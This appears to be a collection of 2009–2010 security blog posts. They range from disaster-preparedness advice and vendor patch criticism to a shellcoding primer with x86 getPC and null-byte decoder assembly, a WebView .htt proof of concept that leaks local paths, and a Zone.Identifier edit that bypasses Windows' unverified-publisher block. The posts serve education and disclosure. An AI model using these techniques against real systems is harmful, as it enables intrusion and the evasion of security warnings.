Absent those who have gone gaga over the iPad, the top news for the past two weeks has been the earthquake and disaster in Haiti.  The concern, the outpourings of support (and, yes, the malware and phishing sites that have been attempting to capitalize on the crisis) are all reminiscent of the tsunami, Katrina, and other events stretching back in time.

Haiti has been different.  The major factor has been the total breakdown of infrastructure, and the consequent difficulty in getting the help to those who need it most.

Those of us in the security communities are always interested in disasters.  We are forever dealing with crises, both large and small, assessing risks, planning and comparing mitigation strategies, and looking at the management of it all.  So, I recall that, when Katrina struck, there were endless discussions of the latest details, the structures, the organization (and lack thereof) in the followup efforts.  One person made a donation to a charity, and challenged the group to match his gift.  I upped the stakes.  I challenged everyone to get trained for disasters.

Unfortunately for the point I’m trying to make, I am speaking from a position of privilege.  Canada has the best emergency structure in the world.  (Our disaster response team is in Haiti at the moment, and is always one of the first on the ground whenever there is a major incident, anywhere.)  British Columbia has the best emergency response management system in Canada.  (No, I’m not volunteering at the Olympics.  But for the past year, I’ve been working with a group that has been planning for the fact that, with the big event in town, even a minor crisis is probably going to mean that we may have to provide emergency lodging for a few hundred people.)  And the North Shore, where I live, has the best disaster training regime in BC.  (The group lodging thing isn’t done by VANOC: it’s an effort by the ESS volunteers from the North Shore, Vancouver, and Richmond.)

Emergency response, in a major disaster, is not simply a matter of having water, generators, blankets, and rescue dogs.  It has to do with organization, co-ordination, management, and, particularly, trained people.  Most of them volunteers, since nobody can afford to pay for a full-time staff of all those you need to have ready in an emergency.

That’s where you come in.

Get trained.

There is some emergency measures organization that covers your area, regardless of where you live.  Your local municpality probably has an office.  And they probably need volunteers.  And they provide training.

If you volunteer, you will probably get trained.  For free.  (You may also get additional perqs.  I get my flu shots paid for every year, since I’m an emergency worker.)

First of all, you’ll probably get trained on what you need for you and your family.  What do you need to survive the first 72 hours following a disaster?  Do you know how much water, what type of food, etc, you need, in the event of a total failure of utilities and other factors we rely on?

Then there are the skills you need to help other people.  Sometimes this might relate to first aid, or structural assessment of buildings after an earthquake, etc.  However, there are many necessary skills that are not quite so dramatic.  Most emergency response, believe it or not, has to do with paperwork.  Who is safe?  Who needs care?  Do families need to be reunited?  Documentation of all of this is a huge effort, which goes on long after the bottles of water and hot meals have been distributed.

Then there are management skills, to co-ordinate all of the other skills.  An awful lot of “charity” gets wasted because some people get too much help, and others don’t get enough.  Someone needs to oversee the efforts.

Training in all of this is available.  And, in an emergency, having trained people is probably more important than having stockpiles of tents.  Trained people can make or improvise shelter.

Maybe your municipality or county doesn’t have a formal emergency structure.  In that case, there are organizations covering the gap.  In Canada, the government doesn’t do it all.  The Red Cross and Salvation Army are two of the groups that have been working on this for years, and have specialists.  In BC we have courses provided by the Justice Institute in a number of areas.  The provincial government has created a marvelous structure, ensuring consistent organizational layout for all sizes and types of disasters, and all types of response.  But we don’t bother reinventing the wheel.  In our formal training curriculum, a number of the courses are prepared, provided and run by the groups that have been doing it for years, and know it best.  If your government doesn’t have the courses available, go to those who do.  They are around.

(For those who have security related certifications, like the CISSP, ongoing professional education is a requirement.  A constant complaint is that training is expensive, and getting the credits costs too much.  I get all kinds of training related to business continuity and disaster recovery.  I get almost all of it free.)

Get trained.  Volunteer.  You’ll get a wealth of experience that will help you plan for all kinds of events, not just for major disasters, but for the minor incidents that plague us and our companies every day.  You’ll be ready for the big stuff, too.  You’ll be able to keep yourself and those near to you safe.  You’ll be able to make a difference to others, certainly reducing suffering, and possibly saving lives.  If and when something major happens, you will be a part of the infrastructure necessary for the response to be effective.  You’ll be part of the solution, rather than part of the problem.

I know, there ain’t no such thing!

Well, we could have a lively debate on that topic, but not right now.

On this occasion, I’m just letting anyone who wonders what happened to the Mac Virus web site (http://www.macvirus.com), which I inherited from Susan Lesch some years ago, what’s happening with it. We have nothing to do with the cobwebby sites at http://www.macvirus.net and http://www.macvirus.org, or with http://macvirus.wordpress.com, whatever that is.

The http://www.macvirus.com URL actually redirects to my own Mac page at Small Blue-Green World site, which now re-redirects to a Wordpress page. If you want to go straight to the Mac Virus blog, you can go direct here. It’s still malware-oriented, of course, and, is likely to become more rather than less active in that area.

In fact, most of my Small Blue-Green World content now resides on blog pages. ESET content is still blogged at http://www.eset.com/threat-center/blog/, of course, and AVIEN content is blogged at http://avien.net/blog/.

Confused? Me too…

We now return you to your normal programming. Scheduling, that is, not coding. Unless that’s what you’re doing at the moment. Oh, never mind.

The next time I blog here, it will be about a proper security issue again. I hope.

David Harley FBCS CITP CISSP
Security Author/Consultant at Small Blue-Green World
Chief Operations Officer, AVIEN
ESET Research Fellow & Director of Malware Intelligence

Also blogging at:
http://avien.net/blog
http://www.eset.com/threat-center/blog
http://smallbluegreenblog.wordpress.com/
http://macviruscom.wordpress.com
http://blog.isc2.org/
http://dharley.wordpress.com

So, let me get this straight, MS was informed about this vulnerability by a security researcher (Meron Sellen) last August, and it’s sat in the Microsoft Security Response Center’s queue to be fixed until Google got hacked, and then they checked their queue to see if they knew about it?

Even though this was acknowledged in September, and MS planned to ship the patch in a cumulative IE update next month, so that’s 6 months, really? Wow, I thought that Adobe had it tough with not having enough developers to patch
This really makes me question the worlds largest OS developer, I have to say. The following questions come to mind though.

- If this was passed to them last September, do they have that many bugs in their code that they haven’t gotten around to this one yet?

- What happened to MS’s secure development program if something like this can get missed?

-  As it’s the fault of a software development house that another 33 companies were hacked, will any legal action be taken against then for this?

- Will/Could Google sue MS for damages if they do decide to pull out of China because of this hack?

Just random thoughts, but hey…

Okay, so a few days ago I found a ton of XSS vulnerabilities on various high profile web sites, and on the whole, after eventually managing to contact the relevant teams for the sites, everyone was very grateful.

When will web sites owners learn that it’s a good idea to have a security contact e-mail address on their sites!

However there was one, whose name I’m not going to mention here, that came back to me with the worst possible answer ever.

This is an online retailer, and my e-mail went to their help desk, but still!

Here’s the full e-mail trail (I’ve removed certain bits of info though so that the site or the attack vector cannot be identified.) Please also note that due the nature of what this company does they are required to be PCI DSS compliant.

===============================

—–Original Message—–
From: xyberpix [mailto:xyberpix@blahblah.com]
Sent: 05 January 2010 07:53
To: help@xxx.com
Subject: Website enquiry: General - www.xxx.com

Sent Date: 2010-01-05 07:52:58 (GMT/UTC)

Hi There,

I have discovered a security vulnerability on your web site, and would like to please disclose this to yourselves responsibly. Could you please either contact me with the name of someone who I should report this to, or could you please get someone to contact me at this e-mail address please. If this could please be treated as urgent.

Thank you
xyberpix

===================================
On 5 Jan 2010, at 16:40, XXX Support User2 wrote:

Hi Xyberpix,

Thank you for your email message.

Can I please ask you to supply the screenshot of the page so that we can look into this for you?

I look forward to your reply, upon which I will do my very best to assist you.

Kind Regards,
Alex | Customer Services Representative
Note: Please do not delete the previous correspondence if you are replying to this e-mail. This will help us to assist you better. www.xxx.com

===================================

—–Original Message—–
From: xyberpix [mailto:xyberpix@blahblah.com]
Sent: 05 January 2010 16:59
To: XXX Support User2
Subject: Re: XXX

Hi Alex,

No problem at all please find attached a screenshot.

Also the string that was used in the main search bar to prove this was the following:

‘;alert yadayadayada

Kind Regards,
xyberpix

==================================

Hi,

Thank you for contacting us and sorry for the inconvenience caused here.

May I kindly request you to clear the cache and cookies from your internet browser and then try placing your order opening a new browser.

If you have any further queries please do let us know.

Kind Regards,
Edwin | Customer Services Representative
XXX!

Note: Please do not delete the previous correspondence if you are replying to this e-mail. This will help us to assist you better.

My wish for 2010: I want this guide to be taught in CS classes to developers everywhere:

http://vrt-sourcefire.blogspot.com/2009/12/matts-guide-to-vendor-response.html

Happy new year everybody.

Rev. 6:6, OCD [1]

“Then it was as if I heard a voice saying: And they shalt go into the storehouses, and look there for the snack foods made from corn [2] which the hands of men have made into hollow cones or cornets [3].  And they shall go unto the Save-On, and unto the Shoppers Drug Mart, and unto the Safeway, and even unto the Zellers, which is the store of last resort when old stock is being cleared out.  And they shall find them not.  And, having no proper snack foods for the parties of the new year, the new year shall come not, and thus shall be the end of times.”

[1] Old Canadian Deviant translation, as opposed to the New American Standard

[2] Some ancient manuscripts add: “And this is not that barelycorn which was known even in Ur of the Chaldees, but that which came from the land newly found by him who gave his name unto a seventies TV detective show, but of whom we may not, at this time, speak”

[3] Scholars debate the meaning of this word.  Most believe that it is simply a reference to “little objects made from corn.”  However, some feel that it is similar to the word for “trumpets,” or, possibly “bugles.”

Well, what more can I say really, good old Adobe have decided that it’s better to hold off on this patch, then to have people working around the clock to try and get this out asap. I suppose they also need to have some time off, after all it is close to Yule, and well they have been really good at releasing patches in a reasonable timescale this year (cough!).

This is the statement from Adobe, which can be found here.

“We posted an update to Security Advisory APSA09-07 that reflects the target ship date of January 12, 2010 for the update to remediate vulnerability CVE-2009-4324. I thought folks might be interested in some of the analysis that went into developing the schedule for the fix, so let me share some of the details in this post.

We evaluated two different options for patching this vulnerability:

1. Stop everything else and start work immediately on an out-of-cycle security update to resolve this vulnerability with a one-off fix. We made major investments as part of our security initiative earlier this year that allow us to deliver patches more quickly. We estimated that delivering an out-of-cycle update would require somewhere between two and three weeks. Unfortunately, this option would also negatively impact the timing of the next quarterly security update for Adobe Reader and Acrobat scheduled for January 12, 2010.
2. Roll the fix for vulnerability CVE-2009-4324 into the code branch for the scheduled January 12, 2010 release. The team determined that by putting additional resources over the holidays towards the engineering and testing work required to ship a high confidence fix for this issue with low risk of introducing any new problems, they could deliver the fix as part of the quarterly update on January 12, 2010.
   

Two important considerations that contributed to our decision to select the second option:

• JavaScript Blacklist mitigation - This new feature, introduced in Adobe Reader and Acrobat versions 9.2 and 8.1.7, with the quarterly update in October, allows individuals as well as administrators of large enterprise managed desktop environments to easily disable access to individual JavaScript APIs. More details on the JavaScript Blacklist mitigation are available here. The feature design and our testing for this specific vulnerability indicate the JavaScript Blacklist is an effective mitigation against the threat without breaking other workflows that rely on JavaScript or other JavaScript APIs.




• Customer schedules - The next quarterly security update for Adobe Reader and Acrobat, scheduled for release on January 12, 2010, will address a number of security vulnerabilities that were responsibly disclosed to Adobe. We are eager to get fixes for these issues out to our users on schedule. Many organizations are in the process of preparing for the January 12, 2010 update. The delay an out-of-cycle security update would force on the regularly scheduled quarterly release represents a significant negative. Additionally, an informal poll we conducted indicated that most of the organizations we talked with were in favor of the second option to better align with their schedules.
  

This is just a brief description of some of the points we considered in our analysis. Ultimately, the decision came down to what we could do to best mitigate threats to our customers, a critical priority to everyone at Adobe - and one we take very seriously.”

I can really see how they are taking this one seriously, as 4 weeks to roll out a critical patch to one of the most widely used applications on the planet really isn’t that bad if you think it, as that’s got to be at least 2 people working on this one. I actually thought that Adobe had more than a couple of developers, but I guess I was wrong.

SecuriTeam Blogs contains several FAQ documents about MS Office vulnerabilities used in targeted attacks since 2006. This time I’m not writing a FAQ. This document has answers to What this means type questions.

What an organization can make to protect?

#1 Disable JavaScript. Deploy a system to deliver this setting to all workstations. This is not the last Adobe 0-day which we will see.

What this means?

Go to Edit>Preferences menu, select item ‘JavaScript’, Uncheck “Enable Acrobat JavaScript” and to save the setting click ‘OK’.

#2 Enable DEP

Some Windows systems include Data Execution Prevention (DEP) functionality.

What this means?

If your organization is using Windows versions with DEP support the code execution can be avoided.

Adobe has confirmed these mitigation advices in security advisory APSA09-07, but as mentioned DEP method doesn’t fully prevent the exploitation.

#3 Do not open PDF documents from unknown sources AND received unexpectedly.

What this means?

If you don’t know the sender who is sending you file attachments there is always a risk that you are a victim of targeted attack. Remember that the sender can be easily spoofed as well.

#4 Switch to alternative PDF reader.

There are many free and commercial products. However, they are often affected by Adobe vulnerabilities too and a patching policy is needed when switching to another product.

What this means?

Changing the PDF reader in large organization is not an easy move. Today is a good day to start the planning project.

Let’s talk about technical details with some words. The vulnerability exists in Doc.media.newPlayer method. The Trojan in these attacks generated connections to http: // foruminspace dot com and http: // newsplaza dot net (these servers are located in Malaysia).

AV vendors use the following names when detecting the malicious PDF document:

Exploit.JS.Pdfka.atq (Kaspersky)

Exploit:W32/AdobeReader.UZ (F-Secure)

Exploit-PDF.ag (McAfee)

PDF/Pidief.NQ (CA)

Trojan.Pidief.H (Symantec)

TROJ_PIDIEF.PGS (Trend Micro)

Troj/PDFJs-FS (Sophos)

The size of the infected PDF document is 400,918 bytes. The file name varies, but it can be note200911.pdf, note_20091210.pdf or Outline of Interview.pdf.

Just reading through Twitter and I saw this from HDM, and thought I’d share

“Adobe PDF 0.9-day added to Metasploit: [msf> use exploit/windows/fileformat/adobe_media_newplayer.rb] (via jduck/pusscat/myself) SVN r7881″

Night All…

In this blog i will talk about anything and everything to do with vulnerability exploitation. This is part of the job I do for SecuriTeam’s SSD. Those that are not aware of the project its aim is to give researchers compensation for their researcher efforts, compensation of course being money not just fame and glory
The work I do revolves around exploits and shellcodes in those exploits that we receive. In this blog post I will focus mostly on simple problems and aspects of writing exploits, and show how I have solved some of these problems in the past.

A common sight when looking for exploitation information is complicated c-and-ugly-assembly-string exploit or shellcode.  Rather than writing up another the 287637639th exploit, I will discuss different problems and goals faced when exploiting and shellcoding.  My main focus will be explaining problems and issues often encountered and a offering simple, general approaches to a solution with an emphasis on working, easy-to-implement solutions.

Rather than building a full(”weaponized”) exploit i will go through the process of building a PoC.  Also, i may feel free to talk about some simple and effective ways of building an exploit-compilation framework.

I like to start from the beginning, but even seasoned exploiters can already prepare themselves for some surprises and twists.

SHELLCODING PRIMER

One of the main problems encountered when exploiting a vulnerability -  even if is is a simple stack overflow - is shellcode restrictions.  often, the nature of the specific vulnerability will prevent us from using specific bytes or force us to use certain combinations.  obviously, every constraint is different. let’s start with the classic  “zero-tolerance” restraint.  This means that our shellcode can not contain null bytes because it was probably originally part of a printable string.

This type of constraint is indeed a classic, text book, example, but is also a common problem in real-world shellcode writing and exploitation. This is very common in vulnerabilities surrounding textual streamds, such as html, xml, telnet and others  (Often these streams can be encoded in unicode but this creates different problems).

In the October patch-Tuesday alone we can find  that many vulnerabilities - especially those in ms09-054  - may require dealing with these limitations (when not serving a unicode-encoded webpage). This is the case with CVE-2009-2529, with some implementations of an exploit for CVE-2009-2530.  This is probably also the case for CVE-2009-2531 and many other vulnerabilities.

If you have never tackled this problem before, stop reading here, and think of  how you would solve this problem.

The answer is of course  a decoder. there are many examples of byte-substitution decoders out there written in hundreds of lines of C.
let’s see what the basic concept behind these is. We want to write code that does not concatenate any null-bytes. therefore we will obviously have to substitute the null-bytes  for something  different, or escape them. does substitution really cut it?

A quick histogram of all the code in kernel32.dll(or choose any other simple dll) shows us that some bytes tend to appear much less in code and printable data.
we can simply histogram our shellcode (use hex workshop) and choose a magic byte to replace.
[picture-histogram]

let’s see what the stages we need to take in order to decode our shellcode. I won’t talk about  OS-specific issues but they are mentioned
- find the position we are running from (aka getPC)
- deal with memory-permission issues
- rewrite our code

Locating home

Finding the position we are running from in order to be able to decode the shellcode, we must first be able to find it. unfortunately x86 does not allow direct access to eip (ia-64 does somewhat . we must find it indirectly. we have several methods of accomplishing this, each with benefits and drawbacks. i am already assuming no null bytes allowed.

We can use the CALL opcode, which will push our  position on to the stack

A naive method using call:
_SIMPLE_CALL_GETPC_
jmp START_GA;
@GET_ADDR:
pop edi;                // get the address that was pushed on to the stack
add edi,(@START_CODE-@RET_ADDR);   //here we calculate our needed address
jmp DECODE;
@START_GA:
call GET_ADDR;        //this will push address of @RET_ADDR on to stack. decodes as “E8FFFF… ”
@RET_ADDR:             //this address will be pushed
@END_GA:
@DECODE:
[decoder goes here]
@START_CODE

or we can use a slightly more sophisticated method:

_CALL_IN_TO_OPCODE_
@GET_ADDR:
call @AFTER_CALL- 1 (call $-1)  == “E8FFFFFFFF”
@AFTER_CALL
db  ‘0xC8′
inc eax
@RET_ADDR:
pop edi
add edi,(@START_CODE-@RET_ADDR)

@END_GA:
@DECODE:
[decoder goes here ]
@START_CODE

What I did here is call in to the call opcode itself . this way the call will be to end-of-opcode-1, which will result in an opcode-encoding that does not contain null bytes, but 0xFFFFFFFF. this is because part of the opcode contains the jump distance and direction. in this case, -1. After the call an ‘dec eax’ (”FFC8″) opcode will be executed.  I could have easily executed a slightly different opcode, but this is fairly harmless, and after addein an ‘inc eax’  this will result in a fancy NOP.

Another option would be to  just use an existing function that can be called(eg. from windows using syscall gateway)
_CALL_EXISTING_FUNCTION_
xor eax,eax
push eax
add eax, 0×3E ; // this can be changed for anything which will not cause damage on specific OS. in this case ntclosefile(NULL);
mov edx,  7FFE0301 // windows “syscall gateway” pointer
dec edx
mov edx, [edx]
call edx        //this will perform an os-specific syscall
@RET_ADDR:
mov edi, [esp-4]
add edi,(@START_CODE-@RET_ADDR)
@END_GA:
@DECODE
[decoder]
@START_CODE

That’s about it for using call. another nice trick is using some fpu opcodes

fld1
FSTENV  [ESP-C] //push fpu state onto stack, including last address of last run fpu opcode. this can be replace by FSAVE/FSTENV/FXSAVW/some other?
pop edi
add edi….

A completely different approach would be to copy our code to a know place. lets choose 7FFE0410 for windows (assuming no nx-bit is present, we know space is not int use, also disregarding the fact that we cannot in reality write to this address, as it is read-only from user mode).
_COPY_THE_CODE_
mov eax, 0×7FFE0410 (7FFE0300+0×110)
[eax = shellcode_postion]
mov dword ptr [eax], 0×90909090 //NOPNOPNOPNOP - the prefect shellcode jmp/call eax

When copying a larger shellcode this will not be very compact/ in order to use string operations, we will have to getPC.  A variant of this method is the famous “seh method” , which essentially does the same, except it will use an interrupt to eventually jump to where the code was copied.

Decoding
Now that we have found our own code base- we can replace our escaped, or replaced bytes.  these are two simple - hack decoders which are easy to implement, and are good enough in many cases. These will only work if we have a byte value which does not appear in the code/data as I discussed above.

XOR_IT_ALL:

jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER  ;smaller than 0×7f. can be done multiple times
mov al, 0xA7

@REPLACE_NEXT:
mov byte ptr bl,[edi]
xor bl,al
inc edi
mov byte ptr [edi],bl
loop @REPLACE_NEXT

@END_DECODER :
NOP
NOP
NOP
NOP
NOP
@END_CODE:

Here we xor’d the whole code with the magic byte. If this magic byte did not exist in original code, than 0×00 would not exist in encoded code. A different method:

SEARCH_AND_DESTROY:
jmp START_GA
@GET_ADDR:
pop edi
add edi,(@END-@RET_ADDR)
jmp DECODE
@START_GA:
call GET_ADDR

@RET_ADDR:
@DECODE:

xor ecx,ecx
add ecx,@END_CODE-@END_DECODER;smaller than ox7f. can be done multiple times
cld
mov al, 0xA7
xor dl,dl

@REPLACE_NEXT:

repnz scasb
mov byte ptr [edi-1],dl
test ecx,ecx
jnz replace_next:
@END_DECODER
NOP
NOP
NOP
NOP
NOP
@END_CODE

in order to build a more robust decoder, which supports escaping, or alphanumeric encoding it is possible to write one from scratch in assembly. Skilined has written a very elegant decoder at http://skypher.com. Another option is and have a small-hack-custom-adapt decoder like the one we just wrote to decode a bigger decoder written in C.in the next upcoming post… i will show how i tried (and succeeded) in building shellcode which has gone through a process of ascii-to-unicode conversion. This shellcode will have to be written so that every second byte, and only every second byte will be a null-byte. try this at home. let me know if you have anything good.

leaving you with one more point for thought.. shellcode that will run on x86 and on x64..

Well, we all use the common hacking tools of the trade like Nmap. Some of us use it on Windows and some on Linux. This post is for the people using it on Windows.
I was connected to a network remotely through the company’s F5 VPN appliance and I wanted to scan the internal network.

It looked like:
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 192.168.1.*

Once I pressed “Enter” I got:
Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-11-10 00:34 Jerusalem Standard Time
WARNING: Using raw sockets because ppp0 is not an ethernet device. This probably won’t work on Windows.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 5 seconds then retry.

pcap_open_live(ppp0, 100, 0, 2) FAILED. Reported error: Error opening adapter: The system cannot find the device specified. (20). Will wait 25 seconds then retry.

Call to pcap_open_live(ppp0, 100, 0, 2) failed three times. Reported error: Error opening adapter: The system cannot find the device specified. (20)

There are several possible reasons for this, depending on your operating system:
LINUX: If you are getting Socket type not supported, try modprobe af_packet or recompile your kernel with SOCK_PACKET enabled.

*BSD: If you are getting device not configured, you need to recompile your kernel with Berkeley Packet Filter support. If you are getting No such file or directory, try creating the device (eg cd /dev; MAKEDEV ; or use mknod).

*WINDOWS: Nmap only supports ethernet interfaces on Windows for most operations because Microsoft disabled raw sockets as of Windows XP SP2. Depending on the reason for this error, it is possible that the — unprivileged command-line argument will help.

SOLARIS: If you are trying to scan localhost or the address of an interface and are getting ‘/dev/lo0: No such file or directory’ or ‘lo0: No DLPI device found’, complain to Sun. I don’t think Solar is can support advanced localhost scans. You can probably use “-PN -sT localhost” though.

QUITTING!

Then I realized that the VPN connection was a PPP device which is probably at the top of the device type interfaces order list and Nmap is trying to use it in order to scan, which is the point of failure because Nmap on Windows without RAW sockets (means Windows XP SP2+) can only use Ethernet devices. So I try played “Imaginary Linux on Windows” and added the option “-e eth0″ which specifies using the Ethernet device indexed at 0 and it worked like a charm.

C:\Documents and Settings\Rafel>nmap -PN -sS -p 445 -e eth0 192.168.1.*

Starting Nmap 5.00 ( http://nmap.org ) at 2009-11-10 00:49 Jerusalem Standard Time
Interesting ports on XXXXX (192.168.0.1):
PORT STATE SERVICE
445/tcp filtered microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 6.03 seconds

I was in another day of jumping from a client to a client, securing another bank in Israel when my girlfriend called and said “Honey, I am at the office, I have absolutely nothing to do and I can’t connect from here to our computer at home to continue my project”. I said, O.K, let’s see what we can do on a 5 minute phone call. Now just want to make it clear, my girlfriend is an Information System Instructor, she is no developer or hacker.

Me: “Honey, go to http://www.teamviewer.com, can you download it?”
Her: “yes, but when I run the setup.exe it says something weired like ‘windows has blocked this software because it can’t verify the publisher’ and it won’t let me install”


Me: “O.K, Open Start-Run, type notepad and space, now click on setup.exe and drag it to the text box at Start->Run. Now add ‘:Zone.Identifier’ just before the last quotes. What do you see?”
Her: “I see something like ZoneId=3, now what?”
Me: “I can’t talk, going into a meeting, try to change it to 1 or delete everything, bye bye bye”

After 10 minutes I get an SMS “thanks honey it worked!!!”.
Well we found a bug, I wouldn’t really call it a “Privilege Escalation” but I guess you don’t have to be a hacker to bypass windows security restrictions

As for any large product, Microsoft Windows operating system is built on its previous versions code. Some of this code even goes back until Microsoft Windows 98.

In Windows 98 a new look was introduced called “WebView” which included the way folders are displayed and the way the desktop is displayed are all HTML templates which were also editable to the default administrative user.You can read more about it here:http://msdn.microsoft.com/en-s/library/bb776835(VS.85).aspx

Those HTML Templates had the extension “htt”. In order for the folder templates to function properly and being able to display the current folder, a few automatically expended variables were added to the module filtering the “htt” files. These are:
%TEMPLATEDIR% (hardcoded)
%THISDIRPATH% (hardcoded)
%THISDIRNAME% (hardcoded)
%BACKGROUNDIMAGE% (registry)
%LOGOLINE% (registry)

This mechanism lives until today deeply inside Windows XP’s code in two modules inside the system32 folder:

    1) Webvw.dll
    2) Mshtml.dll

Webvw.dll is the module which is responsible for all the Webview installation and normal activity and mshtml.dll is the main module for HTML Filtering & Rendering used Windows Explorer and Internet Explorer.

When Microsoft Windows is installed and webvw.dll is registered, it adds it CLSID and a few registry keys. The interesting ones are these:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\BACKGROUNDIMAGE
Default = “%SystemRoot%\Web\wvleft.bmp”
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros\LOGOLINE
Default = “%SystemRoot%\Web\wvline.gif”

Every time an htt file is rendered, without any local-remote or any zone consideration, those variables are replaced with the current system’s path.
This is the code inside mimeflt.cpp which contains the bug:Lines 360 to 433:

#define REG_WEBVIEW_TEMPLATE_MACROS
TEXT("Software\Microsoft\Windows\CurrentVersion\Explorer\
WebView\TemplateMacros")

void ConvertBytesToTChar(LPCBYTE pBuf, UINT nCharSize, LPTSTR psz, int cch) {

    if (SIZEOF(char) == nCharSize) {
         SHAnsiToTChar((LPCSTR)pBuf, psz, cch);
    } else {
        ASSERT(nCharSize == SIZEOF(WCHAR));
         SHUnicodeToTChar((LPCWSTR)pBuf, psz, cch);
    }
}

void ExpandMacro(LPBYTE pszMacro, LPBYTE pszExpansion, int nBytes, UINT nCharSize) {

    TCHAR szExpansion[MAX_PATH];
    szExpansion[0] = TEXT('');
    TCHAR szTCharMacro[MAX_PATH];

    ConvertBytesToTChar(pszMacro, nCharSize, szTCharMacro, ARRAYSIZE(szTCharMacro));
    TCHAR szKey[MAX_PATH];
    lstrcpyn(szKey, REG_WEBVIEW_TEMPLATE_MACROS, ARRAYSIZE(szKey));
    StrCatBuff(szKey, TEXT("\"), ARRAYSIZE(szKey));
    StrCatBuff(szKey, szTCharMacro, ARRAYSIZE(szKey));
    HKEY hkMacros;

    if (RegOpenKey(HKEY_CURRENT_USER, szKey, &hkMacros) == ERROR_SUCCESS && RegOpenKey(HKEY_LOCAL_MACHINE, szKey, &hkMacros) == ERROR_SUCCESS) {
        DWORD dwType;
        DWORD cbData = SIZEOF(szExpansion);
        SHQueryValueEx(hkMacros, NULL, NULL, &dwType, (LPBYTE)szExpansion, &cbData);
        RegCloseKey(hkMacros);
    }

    ConvertTCharToBytes(szExpansion, nCharSize, pszExpansion, nBytes);
}

int CWebViewMimeFilter::_Expand(LPBYTE pszVar, LPBYTE * ppszExp) {
    if (!_StrCmp(pszVar, "TEMPLATEDIR", L"TEMPLATEDIR")) {
        if (!_szTemplateDirPath[0]) {
            GetMachineTemplateDir(_szTemplateDirPath, SIZEOF(_szTemplateDirPath), _nCharSize);
         }

         *ppszExp = _szTemplateDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRPATH", L"THISDIRPATH")) {
        if (!_szThisDirPath[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRPATH, _szThisDirPath, SIZEOF(_szThisDirPath));
        }
        *ppszExp = _szThisDirPath;

    } else if (!_StrCmp(pszVar, "THISDIRNAME", L"THISDIRNAME")) {
        if (!_szThisDirName[0]) {
            _QueryForDVCMDID(DVCMDID_GETTHISDIRNAME, _szThisDirName, SIZEOF(_szThisDirName));
        }
        *ppszExp = _szThisDirName;

    } else {
        ExpandMacro(pszVar, _szExpansion, SIZEOF(_szExpansion), _nCharSize);
        *ppszExp = _szExpansion;
    }

    return _StrLen(*ppszExp);
}

In Windows XP the variables “%THISDIRPATH%” and “%THISDIRNAME%” were removed from the Mime Filter which means %TEMPLATEDIR%, %BACKGROUNDIMAGE% and %LOGOLINE% would still be translated into the current windows directory.

The Proof Of Concept code (Remote WebView Macro Translation):
Save on a remote host with an htt extension and replace “http:///filter_trap.htt

--------------------------- filter_trap.htt start ------------------
[div id="BACKGROUNDIMAGE"]%BACKGROUNDIMAGE%[/div]
[div id="LOGOLINE"]%LOGOLINE%[/div]
[div id="TEMPLATEDIR"]%TEMPLATEDIR%[/div]
[script]
alert(document.getElementById("BACKGROUNDIMAGE").innerHTML);
alert(document.getElementById("LOGOLINE").innerHTML);
alert(document.getElementById("TEMPLATEDIR").innerHTML);
[/script]
--------------------------- filter_trap.htt end -------------------

Microsoft was notified a few months ago, the problem will be fixed.

Occasionally, I see articles like this.

Hackers don’t, as a rule, need to go to such lengths to crack passwords. That’s because most of us fail to follow good security habits. A recent article on PhysOrg cites a study that found people are the weak link in computer security.

This is silly. People don’t need to “follow good security habits” unless they have “security” somewhere in their title. Security is a means to an end, and not the target. The target is to get the job done (or surf the web, or read your emails).

Saying this is not just silly - it’s also dangerous. When experts say “people are the weakest link in computer security”, they remove all responsibility from the security industry to make security better, and easier, for users. Why work on preventing brute-force attacks on passwords? Instead lets force our users to choose a 10 character password including at least 1 number and 1 letter of each case. Oh, and lets prevent those walking security hazards from saving the password in the browser on their malware infested machines. Yeah, that’ll teach them. The article over at discovery.com suggests I use e$4WruX7 as a password - a most helpful advice if I ever saw one. Here’s a better suggestion for you Jonathan: have the system lock out for 24 hours after 3 failed tries.That will make guessing a simple 6 digit-only PIN take more than 450 years.

Enough with this.  Users are not the weakest link any more than drivers are the weakest link in driving accidents. Sure, if we remove users (or drivers) from the equation, that solves all our problems. But since we can’t do that, lets focus on making seat belts, and airbags, and warning systems. Or easier (not harder!) password systems, better protected servers and better user interface.

Wikileaks has released hundreds of thousands pager messages from 11th September, 2001.

Link: 911.wikileaks.org/

Listings say that the messages are sent in networks of Arch Wireless, Metrocall, and SkyTel.

Here’s a weird spam I got last night:

Hello

The route taken through Customs is mainly determined by your point of departure and whether you are bringing into the country more duty payable goods than your free allowance. For those passengers who have flown in from outside the European Community (EC), their baggage will have a white tag and they must pass through either the Red or Green channel according to the amount of duty free goods they have. Those passengers arriving from countries within the EC should use the Blue channel, and their baggage will have green-edged tag.

As part of our routine check and based on the above, we have a consignment in your name; you are advised to come to the office address below

Customs office
Terminal 3
Heathrow Airport

You are required to come with the following:
1. Your ID
2. Diplomatic Tag either white or green-edge tag.
3. Non Inspection document

Your appointment time is 10am GMT, failure to comply; we will have over the matter to Metropolitan and the FBI. I am the officer in charge of your matter.

Thomas Smith
UK Customs
Heathrow Airport

It’s weird, because it contains no advertisement, and no links. There’s nothing “encoded” in it -  it seems to be an old version of this notice.

So why would a spammer waste valuable botnet cycles on sending me the email? The only explanation I could come up with is “a boy who cried wolf” attack. You send this email a few times, and the Baysian filtering systems train themselves that this is a good email (i.e. “ham”). Most Baysian spam filtering systems have a loopback mechanism where spam email is used to train the system further, and ham email is used to teach the system what “good” email is. If this email is seen a few times and considered ham, spam filters will accept something similar to it that contains a link. That link, can be the spam or phishing attack.

